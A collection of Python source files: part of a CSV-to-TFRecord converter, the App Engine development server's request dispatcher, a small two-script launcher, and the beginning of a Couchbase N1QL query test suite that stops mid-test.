# terminate and wait for all parsing processes.
for i in range(num_parsers):
self.in_queue.put("DONE")
for i in range(num_parsers):
parsers[i].join()
# terminate and wait for the writing process.
self.out_queue.put("DONE")
writer.join()
end_time = time.time()
total_time = (end_time - start_time)
logging.warning('Total time %.2f s, speed %.2f sample/s,'
' total samples %d.' %
(total_time, len(dataframe) / total_time, len(dataframe)))
logging.info('%s >>>> END of consuming input file %s <<<<' % (datetime.now(), out_file))
sys.stdout.flush()
@staticmethod
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
@staticmethod
def _float_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
@staticmethod
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def write_feature_map(self, dataframe, path):
with open(path, 'a') as f:
for item in self.CATEGORY_FEATURES:
f.write(','.join([str(dataframe[item].max()), item, 'CATEGORICAL\n']))
for item in self.NUMERICAL_FEATURES:
f.write(','.join(['1', item, 'NUMERICAL\n']))
for item in self.VARIABLE_FEATURES:
pass
# f.write(','.join(['1', item, 'VARIABLE\n']))
for item in self.LABEL:
f.write(','.join([str(dataframe[item].nunique()), item, 'LABEL\n']))
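# --- Illustrative usage sketch (not part of the original module) ---
# The CSV path, output paths, and column names below are hypothetical; they
# only show how CSV2TFRecord is intended to be driven. Categorical and
# variable-length columns are assumed to be integer-encoded already.
if __name__ == '__main__':
    df = pd.read_csv('train.csv')  # hypothetical input table
    converter = CSV2TFRecord(LABEL=['label'],
                             NUMERICAL_FEATURES=['price'],
                             CATEGORY_FEATURES=['user_id', 'item_id'],
                             VARIABLE_FEATURES=[],
                             gzip=True)
    converter(df, 'train.tfrecord', prebatch=1)  # serialize rows to tf.Example protos
    converter.write_feature_map(df, 'feature_map.csv')  # append feature metadata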
|
dispatcher.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of servers and dispatch requests to them."""
import collections
import logging
import os
import threading
import urlparse
import wsgiref.headers
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import scheduled_executor
from google.appengine.tools.devappserver2 import server
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import wsgi_server
_THREAD_POOL = thread_executor.ThreadExecutor()
ResponseTuple = collections.namedtuple('ResponseTuple',
['status', 'headers', 'content'])
class PortRegistry(object):
def __init__(self):
self._ports = {}
self._ports_lock = threading.RLock()
def add(self, port, servr, inst):
with self._ports_lock:
self._ports[port] = (servr, inst)
def get(self, port):
with self._ports_lock:
return self._ports[port]
class Dispatcher(request_info.Dispatcher):
"""A devappserver2 implementation of request_info.Dispatcher.
In addition to the request_info.Dispatcher interface, it owns servers and
manages their lifetimes.
"""
def __init__(self,
configuration,
host,
port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
server_to_max_instances,
use_mtime_file_watcher,
automatic_restart,
allow_skipped_files):
"""Initializer for Dispatcher.
Args:
configuration: An application_configuration.ApplicationConfiguration
instance storing the configuration data for the app.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
port: An int specifying the first port where servers should listen.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to the PHP executable, e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
server_to_max_instances: A mapping between a server name and the maximum
number of instances that can be created (this overrides the settings
found in the configuration argument) e.g.
{'default': 10, 'backend': 15}.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restart: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
self._configuration = configuration
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = None
self._api_port = None
self._running_servers = []
self._server_configurations = {}
self._host = host
self._port = port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._server_name_to_server = {}
self._dispatch_server = None
self._quit_event = threading.Event() # Set when quit() has been called.
self._update_checking_thread = threading.Thread(
target=self._loop_checking_for_updates)
self._server_to_max_instances = server_to_max_instances or {}
self._use_mtime_file_watcher = use_mtime_file_watcher
self._automatic_restart = automatic_restart
self._allow_skipped_files = allow_skipped_files
self._executor = scheduled_executor.ScheduledExecutor(_THREAD_POOL)
self._port_registry = PortRegistry()
def start(self, api_port, request_data):
"""Starts the configured servers.
Args:
api_port: The port that APIServer listens for RPC requests on.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
"""
self._api_port = api_port
self._request_data = request_data
port = self._port
self._executor.start()
if self._configuration.dispatch:
self._dispatch_server = wsgi_server.WsgiServer((self._host, port), self)
self._dispatch_server.start()
logging.info('Starting dispatcher running at: http://%s:%s', self._host,
self._dispatch_server.port)
self._update_checking_thread.start()
if port:
port += 100
self._port_registry.add(self._dispatch_server.port, None, None)
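# The dispatcher itself binds to the base port; each configured server is
# then created on a port offset by 100 and spaced 1000 apart (see
# _create_server). A base port of 0 lets the OS pick free ports instead.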
for server_configuration in self._configuration.servers:
self._server_configurations[
server_configuration.server_name] = server_configuration
servr, port = self._create_server(server_configuration, port)
servr.start()
self._server_name_to_server[server_configuration.server_name] = servr
logging.info('Starting server "%s" running at: http://%s',
server_configuration.server_name, servr.balanced_address)
@property
def dispatch_port(self):
"""The port that the dispatch HTTP server for the Server is listening on."""
assert self._dispatch_server, 'dispatch server not running'
assert self._dispatch_server.ready, 'dispatch server not ready'
return self._dispatch_server.port
@property
def host(self):
"""The host that the HTTP server for this Dispatcher is listening on."""
return self._host
@property
def dispatch_address(self):
"""The address of the dispatch HTTP server e.g. "localhost:8080"."""
if self.dispatch_port != 80:
return '%s:%s' % (self.host, self.dispatch_port)
else:
return self.host
def _check_for_updates(self):
self._configuration.dispatch.check_for_updates()
def _loop_checking_for_updates(self):
"""Loops until the Dispatcher exits, reloading dispatch.yaml config."""
while not self._quit_event.is_set():
self._check_for_updates()
self._quit_event.wait(timeout=1)
def quit(self):
"""Quits all servers."""
self._executor.quit()
self._quit_event.set()
if self._dispatch_server:
self._dispatch_server.quit()
for servr in self._server_name_to_server.values():
servr.quit()
def _create_server(self, server_configuration, port):
max_instances = self._server_to_max_instances.get(
server_configuration.server_name)
server_args = (server_configuration,
self._host,
port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._port,
self._port_registry,
self._request_data,
self,
max_instances,
self._use_mtime_file_watcher,
self._automatic_restart,
self._allow_skipped_files)
if server_configuration.manual_scaling:
servr = server.ManualScalingServer(*server_args)
elif server_configuration.basic_scaling:
servr = server.BasicScalingServer(*server_args)
else:
servr = server.AutoScalingServer(*server_args)
if port != 0:
port += 1000
return servr, port
@property
def servers(self):
return self._server_name_to_server.values()
def get_hostname(self, server_name, version, instance_id=None):
"""Returns the hostname for a (server, version, instance_id) tuple.
If instance_id is set, this will return a hostname for that particular
instance. Otherwise, it will return the hostname used for load-balancing.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
instance_id: An optional str containing the instance ID.
Returns:
A str containing the hostname.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
request_info.VersionDoesNotExistError: The version does not exist.
request_info.InvalidInstanceIdError: The instance ID is not valid for the
server/version or the server/version uses automatic scaling.
"""
servr = self._get_server(server_name, version)
if instance_id is None:
return servr.balanced_address
else:
return servr.get_instance_address(instance_id)
def get_server_names(self):
"""Returns a list of server names."""
return list(self._server_name_to_server)
def get_server_by_name(self, servr):
"""Returns the server with the given name.
Args:
servr: A str containing the name of the server.
Returns:
The server.Server with the provided name.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
try:
return self._server_name_to_server[servr]
except KeyError:
raise request_info.ServerDoesNotExistError(servr)
def get_versions(self, servr):
"""Returns a list of versions for a server.
Args:
servr: A str containing the name of the server.
Returns:
A list of str containing the versions for the specified server.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
if servr in self._server_configurations:
return [self._server_configurations[servr].major_version]
else:
raise request_info.ServerDoesNotExistError(servr)
def get_default_version(self, servr):
"""Returns the default version for a server.
Args:
servr: A str containing the name of the server.
Returns:
A str containing the default version for the specified server.
Raises:
request_info.ServerDoesNotExistError: The server does not exist.
"""
if servr in self._server_configurations:
return self._server_configurations[servr].major_version
else:
raise request_info.ServerDoesNotExistError(servr)
def add_event(self, runnable, eta, service=None, event_id=None):
"""Add a callable to be run at the specified time.
Args:
runnable: A callable object to call at the specified time.
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
This should be set if event_id is set.
event_id: A str containing the id of the event. If set, this can be passed
to update_event to change the time at which the event should run.
"""
if service is not None and event_id is not None:
key = (service, event_id)
else:
key = None
self._executor.add_event(runnable, eta, key)
def update_event(self, eta, service, event_id):
"""Update the eta of a scheduled event.
Args:
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
event_id: A str containing the id of the event to update.
"""
self._executor.update_event(eta, (service, event_id))
def _get_server(self, server_name, version):
if not server_name:
server_name = 'default'
if server_name not in self._server_name_to_server:
raise request_info.ServerDoesNotExistError(server_name)
elif (version is not None and
version != self._server_configurations[server_name].major_version):
raise request_info.VersionDoesNotExistError()
return self._server_name_to_server[server_name]
def set_num_instances(self, server_name, version, num_instances):
"""Sets the number of instances to run for a version of a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
num_instances: An int containing the number of instances to run.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).set_num_instances(num_instances)
def get_num_instances(self, server_name, version):
"""Returns the number of instances running for a version of a server.
Returns:
An int containing the number of instances running for a server version.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
return self._get_server(server_name, version).get_num_instances()
def start_server(self, server_name, version):
"""Starts a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).resume()
def stop_server(self, server_name, version):
"""Stops a server.
Args:
server_name: A str containing the name of the server.
version: A str containing the version.
Raises:
ServerDoesNotExistError: The server does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
"""
self._get_server(server_name, version).suspend()
def send_background_request(self, server_name, version, inst,
background_request_id):
"""Dispatch a background thread request.
Args:
server_name: A str containing the server name to service this
request.
version: A str containing the version to service this request.
inst: The instance to service this request.
background_request_id: A str containing the unique background thread
request identifier.
Raises:
NotSupportedWithAutoScalingError: The provided server/version uses
automatic scaling.
BackgroundThreadLimitReachedError: The instance is at its background
thread capacity.
"""
servr = self._get_server(server_name, version)
try:
inst.reserve_background_thread()
except instance.CannotAcceptRequests:
raise request_info.BackgroundThreadLimitReachedError()
port = servr.get_instance_port(inst.instance_id)
environ = servr.build_request_environ(
'GET', '/_ah/background',
[('X-AppEngine-BackgroundRequest', background_request_id)],
'', '0.1.0.3', port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
servr,
inst,
request_type=instance.BACKGROUND_REQUEST,
catch_and_log_exceptions=True)
# TODO: Think of better names for add_async_request and
# add_request.
def add_async_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None):
"""Dispatch an HTTP request asynchronously.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched to the default
server.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the server and version.
"""
if server_name:
servr = self._get_server(server_name, version)
else:
servr = self._server_for_request(urlparse.urlsplit(relative_url).path)
inst = servr.get_instance(instance_id) if instance_id else None
port = servr.get_instance_port(instance_id) if instance_id else (
servr.balanced_port)
environ = servr.build_request_environ(method, relative_url, headers, body,
source_ip, port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
servr,
inst,
catch_and_log_exceptions=True)
def add_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None,
fake_login=False):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched according to the
host header and relative_url.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched according to the host header
and relative_url.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched
according to the host header and relative_url and, if applicable, the
load-balancing for the server and version.
fake_login: A bool indicating whether login checks should be bypassed,
i.e. "login: required" should be ignored for this request.
Returns:
A request_info.ResponseTuple containing the response information for the
HTTP request.
"""
if server_name:
servr = self._get_server(server_name, version)
inst = servr.get_instance(instance_id) if instance_id else None
else:
headers_dict = wsgiref.headers.Headers(headers)
servr, inst = self._resolve_target(
headers_dict['Host'], urlparse.urlsplit(relative_url).path)
if inst:
try:
port = servr.get_instance_port(inst.instance_id)
except request_info.NotSupportedWithAutoScalingError:
port = servr.balanced_port
else:
port = servr.balanced_port
environ = servr.build_request_environ(method, relative_url, headers, body,
source_ip, port,
fake_login=fake_login)
start_response = start_response_utils.CapturingStartResponse()
response = self._handle_request(environ,
start_response,
servr,
inst)
return request_info.ResponseTuple(start_response.status,
start_response.response_headers,
start_response.merged_response(response))
def _resolve_target(self, hostname, path):
"""Returns the server and instance that should handle this request.
Args:
hostname: A string containing the value of the host header in the request
or None if one was not present.
path: A string containing the path of the request.
Returns:
A tuple (servr, inst) where:
servr: The server.Server that should handle this request.
inst: The instance.Instance that should handle this request or None if
the server's load balancing should decide on the instance.
Raises:
request_info.ServerDoesNotExistError: if hostname is not known.
"""
if self._port == 80:
default_address = self.host
else:
default_address = '%s:%s' % (self.host, self._port)
if not hostname or hostname == default_address:
return self._server_for_request(path), None
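# Otherwise a hostname of the form "<server>.<default_address>" is routed to
# that server by name, and anything else is resolved by port (read here from
# the MY_PORT environment variable) via the port registry.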
default_address_offset = hostname.find(default_address)
if default_address_offset > 0:
prefix = hostname[:default_address_offset - 1]
if '.' in prefix:
raise request_info.ServerDoesNotExistError(prefix)
return self._get_server(prefix, None), None
else:
port = int(os.environ['MY_PORT'])
try:
servr, inst = self._port_registry.get(port)
except KeyError:
raise request_info.ServerDoesNotExistError(hostname)
if not servr:
servr = self._server_for_request(path)
return servr, inst
def _handle_request(self, environ, start_response, servr,
inst=None, request_type=instance.NORMAL_REQUEST,
catch_and_log_exceptions=False):
"""Dispatch a WSGI request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
servr: The server to dispatch this request to.
inst: The instance to service this request. If None, the server will
be left to choose the instance to serve this request.
request_type: The request_type of this request. See instance.*_REQUEST
module constants.
catch_and_log_exceptions: A bool containing whether to catch and log
exceptions in handling the request instead of leaving it for the
caller to handle.
Returns:
An iterable over the response to the request as defined in PEP-333.
"""
try:
return servr._handle_request(environ, start_response, inst=inst,
request_type=request_type)
except:
if catch_and_log_exceptions:
logging.exception('Internal error while handling request.')
else:
raise
def __call__(self, environ, start_response):
return self._handle_request(
environ, start_response, self._server_for_request(environ['PATH_INFO']))
def _server_for_request(self, path):
dispatch = self._configuration.dispatch
if dispatch:
for url, server_name in dispatch.dispatch:
if (url.path_exact and path == url.path or
not url.path_exact and path.startswith(url.path)):
return self._get_server(server_name, None)
return self._get_server(None, None)
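  # Hedged summary: _server_for_request walks the configured dispatch rules in
  # order, matching the request path exactly when url.path_exact is set and by
  # prefix otherwise, and falls back to the default server
  # (self._get_server(None, None)) when no rule matches.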
|
main.py
|
from threading import Thread
import subprocess
import os
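# Hedged description: this launcher runs src/python/ardui.py and src/python/spectro.py
# with the project's virtualenv interpreter (Windows-style env/Scripts layout), each
# wrapped in its own thread around subprocess.run, and then waits for both to finish.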
if __name__ == '__main__':
dirname = os.path.dirname(__file__)
t1 = Thread(target=subprocess.run, args=([os.path.join(dirname,"env/Scripts/python"), os.path.join(dirname,"src/python/ardui.py")],))
t2 = Thread(target=subprocess.run, args=([os.path.join(dirname,"env/Scripts/python"), os.path.join(dirname,"src/python/spectro.py")],))
    t1.daemon = True
    t2.daemon = True
t1.start()
t2.start()
t1.join()
t2.join()
|
newtuq_tests.py
|
import logging
import threading
from .tuq import QueryTests
class QueryNewTuqTests(QueryTests):
def setUp(self):
super(QueryNewTuqTests, self).setUp()
self.log.info("============== QueryNewTuqTests setup has started ==============")
self.log.info("============== QueryNewTuqTests setup has started ==============")
self.log_config_info()
def suite_setUp(self):
super(QueryNewTuqTests, self).suite_setUp()
self.log.info("============== QueryNewTuqTests suite_setup has started ==============")
self.log.info("============== QueryNewTuqTests suite_setup has started ==============")
self.log_config_info()
def tearDown(self):
self.log_config_info()
self.log.info("============== QueryNewTuqTests tearDown has started ==============")
self.log.info("============== QueryNewTuqTests tearDown has started ==============")
super(QueryNewTuqTests, self).tearDown()
def suite_tearDown(self):
self.log_config_info()
self.log.info("============== QueryNewTuqTests suite_tearDown has started ==============")
self.log.info("============== QueryNewTuqTests suite_tearDown has started ==============")
super(QueryNewTuqTests, self).suite_tearDown()
##############################################################################################
#
# SIMPLE CHECKS
##############################################################################################
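    # Note (hedged): the $str0/$int0/$obj0 tokens in the query templates below are
    # placeholders; run_query_from_template substitutes them with generated field
    # names and returns both the actual query result and the expected result used
    # by _verify_results.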
def test_simple_check(self):
self.fail_if_no_buckets()
self.ensure_primary_indexes_exist()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t1 = threading.Thread(name='run_simple', target=self.run_active_requests, args=(e, 2))
t1.start()
query = 'select * from %s' %(bucket.name)
self.run_cbq_query(query)
logging.debug("event is set")
if self.monitoring:
e.set()
t1.join(100)
query_template = 'FROM %s select $str0, $str1 ORDER BY $str0,$str1 ASC' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
#No usages anywhere
def test_joins_monitoring(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
e = threading.Event()
if self.monitoring:
e = threading.Event()
t2 = threading.Thread(name='run_joins', target=self.run_active_requests, args=(e, 2))
t2.start()
query = 'select * from %s b1 inner join %s b2 on keys b1.CurrencyCode inner join %s b3 on keys b1.CurrencyCode left outer join %s b4 on keys b1.CurrencyCode' % (bucket.name, bucket.name, bucket.name, bucket.name)
actual_result = self.run_cbq_query(query)
logging.debug("event is set")
if self.monitoring:
e.set()
t2.join(100)
def test_simple_negative_check(self):
queries_errors = {'SELECT $str0 FROM {0} WHERE COUNT({0}.$str0)>3':
'Aggregates not allowed in WHERE',
'SELECT *.$str0 FROM {0}': 'syntax error',
'SELECT *.* FROM {0} ... ERROR': 'syntax error',
'FROM %s SELECT $str0 WHERE id=null': 'syntax error',}
self.negative_common_body(queries_errors)
def test_unnest(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT emp.$int0, task FROM %s emp UNNEST emp.$nested_list_3l0 task' % bucket.name
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_subquery_select(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
self.query = 'SELECT $str0, $subquery(SELECT COUNT($str0) cn FROM %s d USE KEYS $5) as names FROM %s' % (bucket.name,
bucket.name)
actual_result, expected_result = self.run_query_with_subquery_select_from_template(self.query)
self._verify_results(actual_result['results'], expected_result)
def test_subquery_from(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
self.query = 'SELECT tasks.$str0 FROM $subquery(SELECT $str0, $int0 FROM %s) as tasks' % (bucket.name)
actual_result, expected_result = self.run_query_with_subquery_from_template(self.query)
self._verify_results(actual_result['results'], expected_result)
def test_consistent_simple_check(self):
self.fail_if_no_buckets()
queries = [self.gen_results.generate_query('SELECT $str0, $int0, $int1 FROM %s ' +\
'WHERE $str0 IS NOT NULL AND $int0<10 ' +\
'OR $int1 = 6 ORDER BY $int0, $int1'),
self.gen_results.generate_query('SELECT $str0, $int0, $int1 FROM %s ' +\
'WHERE $int1 = 6 OR $str0 IS NOT NULL AND ' +\
'$int0<10 ORDER BY $int0, $int1')]
for bucket in self.buckets:
actual_result1 = self.run_cbq_query(queries[0] % bucket.name)
actual_result2 = self.run_cbq_query(queries[1] % bucket.name)
self.assertTrue(actual_result1['results'] == actual_result2['results'],
"Results are inconsistent.Difference: %s %s %s %s" %(
len(actual_result1['results']), len(actual_result2['results']),
actual_result1['results'][:100], actual_result2['results'][:100]))
def test_simple_nulls(self):
self.fail_if_no_buckets()
queries = ['SELECT id FROM %s WHERE id=NULL or id="null"']
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t3 = threading.Thread(name='run_simple_nulls', target=self.run_active_requests, args=(e, 2))
t3.start()
for query in queries:
actual_result = self.run_cbq_query(query % (bucket.name))
logging.debug("event is set")
if self.monitoring:
e.set()
t3.join(100)
self._verify_results(actual_result['results'], [])
'''MB-22550: Simple check that ensures
OBJECT_RENAME and OBJECT_REPLACE functions work as intended'''
def test_object_rename_replace(self):
rename_result = self.run_cbq_query(
'select OBJECT_RENAME( { "a": 1, "b": 2 }, "b", "c" ) ')
self.assertTrue("b" not in rename_result['results'][0]['$1']
and "c" in rename_result['results'][0]['$1'])
replace_result = self.run_cbq_query(
'select OBJECT_REPLACE( { "a": 1, "b": 2 }, 2, 3 )')
self.assertTrue(replace_result['results'][0]['$1']['b'] == 3)
str_replace = self.run_cbq_query(
'select OBJECT_REPLACE( { "a": 1, "b": 2 }, 2, "ajay" ) ')
self.assertTrue(str_replace['results'][0]['$1']['b'] == "ajay")
##############################################################################################
#
# LIMIT OFFSET CHECKS
##############################################################################################
#Not used anywhere
def test_limit_negative(self):
#queries_errors = {'SELECT * FROM default LIMIT {0}' : ('Invalid LIMIT value 2.5', 5030)}
queries_errors = {'SELECT ALL * FROM %s' : ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_limit_offset(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t4 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t4.start()
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t4.join(100)
self._verify_results(actual_result['results'], expected_result)
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10 OFFSET 10' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
def test_limit_offset_zero(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 0' % (bucket.name)
self.query = self.gen_results.generate_query(query_template)
actual_result = self.run_cbq_query()
self.assertEqual(actual_result['results'], [],
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], []))
query_template = 'SELECT DISTINCT $str0 FROM %s ORDER BY $str0 LIMIT 10 OFFSET 0' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
def test_limit_offset_negative_check(self):
queries_errors = {'SELECT DISTINCT $str0 FROM {0} LIMIT 1.1' :
'Invalid LIMIT value 1.1',
'SELECT DISTINCT $str0 FROM {0} OFFSET 1.1' :
'Invalid OFFSET value 1.1'}
self.negative_common_body(queries_errors)
def test_limit_offset_sp_char_check(self):
queries_errors = {'SELECT DISTINCT $str0 FROM {0} LIMIT ~' :
                              'syntax error',
                          'SELECT DISTINCT $str0 FROM {0} OFFSET ~' :
                              'syntax error'}
self.negative_common_body(queries_errors)
##############################################################################################
#
# ALIAS CHECKS
##############################################################################################
def test_simple_alias(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t5 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t5.start()
query_template = 'SELECT COUNT($str0) AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
if self.analytics:
query_template = 'SELECT COUNT(`$str0`) AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
query_template = 'SELECT COUNT(*) + 1 AS COUNT_EMPLOYEE FROM %s' % (bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t5.join(100)
expected_result = [ { "COUNT_EMPLOYEE": expected_result[0]['COUNT_EMPLOYEE'] + 1 } ]
self.assertEqual(actual_result['results'], expected_result,
"Results are incorrect.Actual %s.\n Expected: %s.\n" % (
actual_result['results'], expected_result))
def test_simple_negative_alias(self):
queries_errors = {'SELECT $str0._last_name as *' : 'syntax error',
'SELECT $str0._last_name as DATABASE ?' : 'syntax error',
'SELECT $str0 AS NULL FROM {0}' : 'syntax error',
'SELECT $str1 as $str0, $str0 FROM {0}' :
'Duplicate result alias name'}
if self.does_test_meet_server_version(6, 5, 0):
queries_errors['SELECT test.$obj0 as points FROM {0} AS TEST ' +
'GROUP BY $obj0 AS GROUP_POINT'] = 'must depend only on group keys or aggregates'
self.negative_common_body(queries_errors)
def test_alias_from_clause(self):
self.fail_if_no_buckets()
queries_templates = ['SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ORDER BY points',
'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test WHERE test.$int0 >0' +\
' ORDER BY points',
'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ' +\
'GROUP BY test.$obj0.$_obj0_int0 ORDER BY points']
# if self.analytics:
# queries_templates = ['SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test ORDER BY test.points',
# 'SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test WHERE test.$int0 >0' +\
# ' ORDER BY test.points',
# 'SELECT test.$obj0.$_obj0_int0 AS points FROM %s AS test ' +\
# 'GROUP BY test.$obj0.$_obj0_int0 ORDER BY test.points']
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t6 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t6.start()
for query_template in queries_templates:
actual_result, expected_result = self.run_query_from_template(query_template % (bucket.name))
if self.monitoring:
e.set()
t6.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_from_clause_group(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $obj0.$_obj0_int0 AS points FROM %s AS test ' %(bucket.name) +\
'GROUP BY $obj0.$_obj0_int0 ORDER BY points'
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_alias_order_desc(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t7 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t7.start()
query_template = 'SELECT $str0 AS name_new FROM %s AS test ORDER BY name_new DESC' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
if self.monitoring:
e.set()
t7.join(100)
self._verify_results(actual_result['results'], expected_result)
def test_alias_order_asc(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
query_template = 'SELECT $str0 AS name_new FROM %s AS test ORDER BY name_new ASC' %(
bucket.name)
if self.analytics:
query_template = 'SELECT `$str0` AS name_new FROM %s AS test ORDER BY name_new ASC' %(
bucket.name)
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def test_alias_aggr_fn(self):
self.fail_if_no_buckets()
for bucket in self.buckets:
if self.monitoring:
e = threading.Event()
t8 = threading.Thread(name='run_limit_offset', target=self.run_active_requests, args=(e, 2))
t8.start()
query_template = 'SELECT COUNT(TEST.$str0) from %s AS TEST' %(bucket.name)
if self.analytics:
query_template = 'SELECT COUNT(TEST.`$str0`) from %s AS TEST' %(bucket.name)
